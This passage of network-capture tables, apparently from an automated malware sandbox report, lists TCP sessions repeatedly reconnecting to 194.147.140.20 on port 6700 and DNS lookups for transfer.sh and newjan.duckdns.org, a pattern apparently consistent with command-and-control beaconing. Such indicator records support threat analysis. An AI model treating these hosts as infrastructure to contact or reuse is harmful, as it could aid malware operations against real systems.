Sep 14, 2021 17:05:21.211549997 CEST	49806	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:25.454071045 CEST	49807	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:25.646642923 CEST	6700	49807	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:25.646790028 CEST	49807	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:25.647654057 CEST	49807	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:25.859798908 CEST	6700	49807	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:25.860253096 CEST	49807	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:26.054414034 CEST	6700	49807	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:26.056162119 CEST	49807	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:26.302159071 CEST	6700	49807	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:26.304754019 CEST	49807	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:26.410367966 CEST	6700	49807	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:26.461312056 CEST	49807	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:26.496176004 CEST	6700	49807	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:26.496747971 CEST	49807	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:26.655163050 CEST	6700	49807	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:26.695557117 CEST	49807	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:26.735841990 CEST	6700	49807	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:26.736994982 CEST	49807	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:26.932295084 CEST	6700	49807	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:26.983901024 CEST	49807	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:27.177582026 CEST	6700	49807	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:27.226962090 CEST	49807	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:27.275235891 CEST	49807	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:27.517060041 CEST	6700	49807	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:28.274424076 CEST	49807	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:32.488290071 CEST	49808	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:32.679455042 CEST	6700	49808	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:32.679626942 CEST	49808	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:32.680489063 CEST	49808	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:32.886821985 CEST	6700	49808	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:32.886921883 CEST	49808	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:33.136281013 CEST	6700	49808	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:33.136490107 CEST	49808	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:33.327476978 CEST	6700	49808	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:33.328907013 CEST	49808	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:33.591686964 CEST	6700	49808	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:33.701322079 CEST	6700	49808	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:33.702706099 CEST	49808	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:33.894360065 CEST	6700	49808	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:33.894624949 CEST	49808	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:34.137502909 CEST	6700	49808	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:34.137681961 CEST	49808	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:34.334011078 CEST	6700	49808	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:34.383678913 CEST	49808	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:34.578182936 CEST	6700	49808	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:34.633620977 CEST	49808	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:34.869210005 CEST	49808	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:38.956425905 CEST	49809	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:39.147320986 CEST	6700	49809	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:39.147552967 CEST	49809	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:39.148513079 CEST	49809	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:39.354937077 CEST	6700	49809	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:39.355348110 CEST	49809	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:39.546899080 CEST	6700	49809	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:39.548286915 CEST	49809	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:39.792514086 CEST	6700	49809	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:39.916114092 CEST	49809	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:39.936362982 CEST	6700	49809	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:39.977940083 CEST	49809	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:40.123207092 CEST	6700	49809	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:40.126733065 CEST	49809	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:40.386127949 CEST	6700	49809	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:40.386346102 CEST	49809	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:40.578381062 CEST	6700	49809	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:40.634270906 CEST	49809	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:40.826730967 CEST	6700	49809	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:40.868586063 CEST	49809	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:40.931772947 CEST	49809	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:41.183054924 CEST	6700	49809	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:41.938610077 CEST	49809	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:46.120923042 CEST	49810	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:46.311501026 CEST	6700	49810	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:46.311642885 CEST	49810	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:46.313129902 CEST	49810	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:46.517409086 CEST	6700	49810	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:46.525870085 CEST	49810	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:46.717812061 CEST	6700	49810	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:46.719386101 CEST	49810	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:46.974937916 CEST	6700	49810	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:46.975188017 CEST	49810	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:47.102638960 CEST	6700	49810	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:47.150317907 CEST	49810	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:47.166702986 CEST	6700	49810	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:47.166937113 CEST	49810	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:47.342294931 CEST	6700	49810	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:47.384696007 CEST	49810	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:47.537488937 CEST	6700	49810	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:47.537694931 CEST	49810	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:47.729305983 CEST	6700	49810	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:47.775389910 CEST	49810	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:47.966458082 CEST	6700	49810	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:47.995265961 CEST	49810	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:48.260051966 CEST	6700	49810	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:48.995862961 CEST	49810	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:53.093383074 CEST	49811	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:53.285362959 CEST	6700	49811	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:53.286811113 CEST	49811	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:53.287338018 CEST	49811	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:53.493937016 CEST	6700	49811	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:53.497524977 CEST	49811	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:53.691447973 CEST	6700	49811	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:53.694159985 CEST	49811	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:53.939460993 CEST	6700	49811	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:54.027276993 CEST	49811	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:54.254611969 CEST	6700	49811	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:54.256238937 CEST	49811	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:54.500720978 CEST	6700	49811	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:54.502724886 CEST	49811	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:54.695893049 CEST	6700	49811	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:54.696158886 CEST	49811	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:54.887703896 CEST	6700	49811	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:54.932485104 CEST	49811	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:55.073990107 CEST	49811	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:55.314177036 CEST	6700	49811	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:56.089365005 CEST	49811	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:06:00.275662899 CEST	49812	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:06:00.468693972 CEST	6700	49812	194.147.140.20	192.168.2.5
Sep 14, 2021 17:06:00.468879938 CEST	49812	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:06:00.479988098 CEST	49812	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:06:00.685271025 CEST	6700	49812	194.147.140.20	192.168.2.5
Sep 14, 2021 17:06:00.685769081 CEST	49812	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:06:00.880248070 CEST	6700	49812	194.147.140.20	192.168.2.5
Sep 14, 2021 17:06:00.881589890 CEST	49812	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:06:01.126574993 CEST	6700	49812	194.147.140.20	192.168.2.5
Sep 14, 2021 17:06:01.126750946 CEST	49812	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:06:01.255839109 CEST	6700	49812	194.147.140.20	192.168.2.5
Sep 14, 2021 17:06:01.307946920 CEST	49812	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:06:01.321126938 CEST	6700	49812	194.147.140.20	192.168.2.5
Sep 14, 2021 17:06:01.321369886 CEST	49812	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:06:01.500019073 CEST	6700	49812	194.147.140.20	192.168.2.5
Sep 14, 2021 17:06:01.542231083 CEST	49812	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:06:01.570986986 CEST	6700	49812	194.147.140.20	192.168.2.5
Sep 14, 2021 17:06:01.571266890 CEST	49812	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:06:01.739584923 CEST	6700	49812	194.147.140.20	192.168.2.5
Sep 14, 2021 17:06:01.792176962 CEST	49812	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:06:01.814181089 CEST	6700	49812	194.147.140.20	192.168.2.5
Sep 14, 2021 17:06:01.991183043 CEST	6700	49812	194.147.140.20	192.168.2.5
Sep 14, 2021 17:06:02.042404890 CEST	49812	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:06:02.167850018 CEST	49812	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:06:02.423604965 CEST	6700	49812	194.147.140.20	192.168.2.5
Sep 14, 2021 17:06:03.183532000 CEST	49812	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:06:07.289069891 CEST	49813	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:06:07.488040924 CEST	6700	49813	194.147.140.20	192.168.2.5
Sep 14, 2021 17:06:07.488189936 CEST	49813	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:06:07.488874912 CEST	49813	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:06:07.703051090 CEST	6700	49813	194.147.140.20	192.168.2.5
Sep 14, 2021 17:06:07.703481913 CEST	49813	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:06:07.904488087 CEST	6700	49813	194.147.140.20	192.168.2.5
Sep 14, 2021 17:06:07.905236959 CEST	49813	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:06:08.158781052 CEST	6700	49813	194.147.140.20	192.168.2.5
Sep 14, 2021 17:06:08.271498919 CEST	6700	49813	194.147.140.20	192.168.2.5
Sep 14, 2021 17:06:08.272104025 CEST	49813	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:06:08.469906092 CEST	6700	49813	194.147.140.20	192.168.2.5
Sep 14, 2021 17:06:08.470923901 CEST	49813	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:06:08.668124914 CEST	6700	49813	194.147.140.20	192.168.2.5
Sep 14, 2021 17:06:08.668227911 CEST	49813	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:06:08.867233038 CEST	6700	49813	194.147.140.20	192.168.2.5
Sep 14, 2021 17:06:08.917829037 CEST	49813	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:06:10.221724033 CEST	6700	49813	194.147.140.20	192.168.2.5
Sep 14, 2021 17:06:10.277285099 CEST	49813	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:06:12.691170931 CEST	6700	49813	194.147.140.20	192.168.2.5
Sep 14, 2021 17:06:12.746344090 CEST	49813	6700	192.168.2.5	194.147.140.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 14, 2021 17:01:58.446487904 CEST	61805	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:01:58.473644972 CEST	53	61805	8.8.8.8	192.168.2.5
Sep 14, 2021 17:02:15.554327011 CEST	54795	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:02:15.642925024 CEST	53	54795	8.8.8.8	192.168.2.5
Sep 14, 2021 17:02:20.249532938 CEST	49557	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:02:20.295826912 CEST	53	49557	8.8.8.8	192.168.2.5
Sep 14, 2021 17:02:30.353084087 CEST	61733	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:02:30.401892900 CEST	53	61733	8.8.8.8	192.168.2.5
Sep 14, 2021 17:02:46.811794043 CEST	65447	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:02:46.848052025 CEST	53	65447	8.8.8.8	192.168.2.5
Sep 14, 2021 17:02:49.693105936 CEST	52441	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:02:49.721591949 CEST	53	52441	8.8.8.8	192.168.2.5
Sep 14, 2021 17:02:52.068705082 CEST	62176	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:02:52.097433090 CEST	53	62176	8.8.8.8	192.168.2.5
Sep 14, 2021 17:03:07.279985905 CEST	59596	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:03:07.325210094 CEST	53	59596	8.8.8.8	192.168.2.5
Sep 14, 2021 17:03:14.455723047 CEST	65296	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:03:14.486423969 CEST	53	65296	8.8.8.8	192.168.2.5
Sep 14, 2021 17:03:23.593455076 CEST	63183	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:03:23.718456030 CEST	53	63183	8.8.8.8	192.168.2.5
Sep 14, 2021 17:03:30.854085922 CEST	60151	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:03:30.975950956 CEST	53	60151	8.8.8.8	192.168.2.5
Sep 14, 2021 17:03:38.064030886 CEST	56969	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:03:38.093221903 CEST	53	56969	8.8.8.8	192.168.2.5
Sep 14, 2021 17:03:43.389189005 CEST	55161	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:03:43.424387932 CEST	53	55161	8.8.8.8	192.168.2.5
Sep 14, 2021 17:03:44.209589958 CEST	54757	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:03:44.242650986 CEST	53	54757	8.8.8.8	192.168.2.5
Sep 14, 2021 17:03:45.268093109 CEST	49992	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:03:45.299216986 CEST	53	49992	8.8.8.8	192.168.2.5
Sep 14, 2021 17:03:51.602555037 CEST	60075	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:03:51.728991032 CEST	53	60075	8.8.8.8	192.168.2.5
Sep 14, 2021 17:03:58.636343002 CEST	55016	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:03:58.764154911 CEST	53	55016	8.8.8.8	192.168.2.5
Sep 14, 2021 17:04:05.685909986 CEST	64345	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:04:05.714601994 CEST	53	64345	8.8.8.8	192.168.2.5
Sep 14, 2021 17:04:12.551467896 CEST	57128	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:04:12.579477072 CEST	53	57128	8.8.8.8	192.168.2.5
Sep 14, 2021 17:04:19.037326097 CEST	54791	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:04:19.161900043 CEST	53	54791	8.8.8.8	192.168.2.5
Sep 14, 2021 17:04:26.147763014 CEST	50463	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:04:26.173017025 CEST	53	50463	8.8.8.8	192.168.2.5
Sep 14, 2021 17:04:34.367914915 CEST	50394	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:04:34.398400068 CEST	53	50394	8.8.8.8	192.168.2.5
Sep 14, 2021 17:04:35.946110010 CEST	58530	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:04:35.975914955 CEST	53	58530	8.8.8.8	192.168.2.5
Sep 14, 2021 17:04:36.855626106 CEST	53813	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:04:36.886852980 CEST	53	53813	8.8.8.8	192.168.2.5
Sep 14, 2021 17:04:37.650866985 CEST	63732	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:04:37.683711052 CEST	53	63732	8.8.8.8	192.168.2.5
Sep 14, 2021 17:04:38.280445099 CEST	57344	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:04:38.310897112 CEST	53	57344	8.8.8.8	192.168.2.5
Sep 14, 2021 17:04:39.119468927 CEST	54450	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:04:39.146837950 CEST	53	54450	8.8.8.8	192.168.2.5
Sep 14, 2021 17:04:39.694634914 CEST	59261	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:04:39.722002983 CEST	53	59261	8.8.8.8	192.168.2.5
Sep 14, 2021 17:04:40.167107105 CEST	57151	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:04:40.194138050 CEST	53	57151	8.8.8.8	192.168.2.5
Sep 14, 2021 17:04:41.110816002 CEST	59413	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:04:41.139383078 CEST	53	59413	8.8.8.8	192.168.2.5
Sep 14, 2021 17:04:41.681593895 CEST	60516	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:04:41.709248066 CEST	53	60516	8.8.8.8	192.168.2.5
Sep 14, 2021 17:04:41.964127064 CEST	51649	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:04:41.989293098 CEST	53	51649	8.8.8.8	192.168.2.5
Sep 14, 2021 17:04:42.395649910 CEST	65086	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:04:42.428261995 CEST	53	65086	8.8.8.8	192.168.2.5
Sep 14, 2021 17:04:48.845809937 CEST	56432	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:04:48.967883110 CEST	53	56432	8.8.8.8	192.168.2.5
Sep 14, 2021 17:04:55.919852972 CEST	52929	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:04:56.045280933 CEST	53	52929	8.8.8.8	192.168.2.5
Sep 14, 2021 17:05:02.994874954 CEST	64317	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:05:03.024739027 CEST	53	64317	8.8.8.8	192.168.2.5
Sep 14, 2021 17:05:10.327344894 CEST	61004	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:05:10.354581118 CEST	53	61004	8.8.8.8	192.168.2.5
Sep 14, 2021 17:05:18.187422991 CEST	56895	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:05:18.311486006 CEST	53	56895	8.8.8.8	192.168.2.5
Sep 14, 2021 17:05:25.309194088 CEST	62372	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:05:25.436649084 CEST	53	62372	8.8.8.8	192.168.2.5
Sep 14, 2021 17:05:32.348048925 CEST	61515	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:05:32.478907108 CEST	53	61515	8.8.8.8	192.168.2.5
Sep 14, 2021 17:05:38.924959898 CEST	56675	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:05:38.954695940 CEST	53	56675	8.8.8.8	192.168.2.5
Sep 14, 2021 17:05:45.985580921 CEST	57172	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:05:46.116606951 CEST	53	57172	8.8.8.8	192.168.2.5
Sep 14, 2021 17:05:53.057068110 CEST	55267	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:05:53.091439009 CEST	53	55267	8.8.8.8	192.168.2.5
Sep 14, 2021 17:06:00.149832010 CEST	50969	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:06:00.274141073 CEST	53	50969	8.8.8.8	192.168.2.5
Sep 14, 2021 17:06:07.254381895 CEST	64362	53	192.168.2.5	8.8.8.8
Sep 14, 2021 17:06:07.287725925 CEST	53	64362	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 14, 2021 17:02:15.554327011 CEST	192.168.2.5	8.8.8.8	0x2199	Standard query (0)	transfer.sh	A (IP address)	IN (0x0001)
Sep 14, 2021 17:02:49.693105936 CEST	192.168.2.5	8.8.8.8	0x6c52	Standard query (0)	transfer.sh	A (IP address)	IN (0x0001)
Sep 14, 2021 17:03:23.593455076 CEST	192.168.2.5	8.8.8.8	0xc0eb	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 17:03:30.854085922 CEST	192.168.2.5	8.8.8.8	0x923b	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 17:03:38.064030886 CEST	192.168.2.5	8.8.8.8	0xb557	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 17:03:44.209589958 CEST	192.168.2.5	8.8.8.8	0xb358	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 17:03:51.602555037 CEST	192.168.2.5	8.8.8.8	0x6222	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 17:03:58.636343002 CEST	192.168.2.5	8.8.8.8	0x4c8f	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 17:04:05.685909986 CEST	192.168.2.5	8.8.8.8	0x51df	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 17:04:12.551467896 CEST	192.168.2.5	8.8.8.8	0x656	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 17:04:19.037326097 CEST	192.168.2.5	8.8.8.8	0xf1d1	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 17:04:26.147763014 CEST	192.168.2.5	8.8.8.8	0x403d	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 17:04:34.367914915 CEST	192.168.2.5	8.8.8.8	0xddc6	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 17:04:41.681593895 CEST	192.168.2.5	8.8.8.8	0x5910	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 17:04:48.845809937 CEST	192.168.2.5	8.8.8.8	0x408d	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 17:04:55.919852972 CEST	192.168.2.5	8.8.8.8	0x7a0b	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 17:05:02.994874954 CEST	192.168.2.5	8.8.8.8	0x546c	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 17:05:10.327344894 CEST	192.168.2.5	8.8.8.8	0x3c00	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 17:05:18.187422991 CEST	192.168.2.5	8.8.8.8	0xef77	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 17:05:25.309194088 CEST	192.168.2.5	8.8.8.8	0xc768	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 17:05:32.348048925 CEST	192.168.2.5	8.8.8.8	0x5d4a	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 17:05:38.924959898 CEST	192.168.2.5	8.8.8.8	0x4fae	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 17:05:45.985580921 CEST	192.168.2.5	8.8.8.8	0x15fa	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 17:05:53.057068110 CEST	192.168.2.5	8.8.8.8	0xb611	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 17:06:00.149832010 CEST	192.168.2.5	8.8.8.8	0x41cd	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 17:06:07.254381895 CEST	192.168.2.5	8.8.8.8	0xe393	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Sep 14, 2021 17:02:15.642925024 CEST	8.8.8.8	192.168.2.5	0x2199	No error (0)	transfer.sh	144.76.136.153	A (IP address)	IN (0x0001)
Sep 14, 2021 17:02:49.721591949 CEST	8.8.8.8	192.168.2.5	0x6c52	No error (0)	transfer.sh	144.76.136.153	A (IP address)	IN (0x0001)
Sep 14, 2021 17:03:23.718456030 CEST	8.8.8.8	192.168.2.5	0xc0eb	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 17:03:30.975950956 CEST	8.8.8.8	192.168.2.5	0x923b	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 17:03:38.093221903 CEST	8.8.8.8	192.168.2.5	0xb557	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 17:03:44.242650986 CEST	8.8.8.8	192.168.2.5	0xb358	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 17:03:51.728991032 CEST	8.8.8.8	192.168.2.5	0x6222	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 17:03:58.764154911 CEST	8.8.8.8	192.168.2.5	0x4c8f	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 17:04:05.714601994 CEST	8.8.8.8	192.168.2.5	0x51df	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 17:04:12.579477072 CEST	8.8.8.8	192.168.2.5	0x656	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 17:04:19.161900043 CEST	8.8.8.8	192.168.2.5	0xf1d1	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 17:04:26.173017025 CEST	8.8.8.8	192.168.2.5	0x403d	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 17:04:34.398400068 CEST	8.8.8.8	192.168.2.5	0xddc6	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 17:04:41.709248066 CEST	8.8.8.8	192.168.2.5	0x5910	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
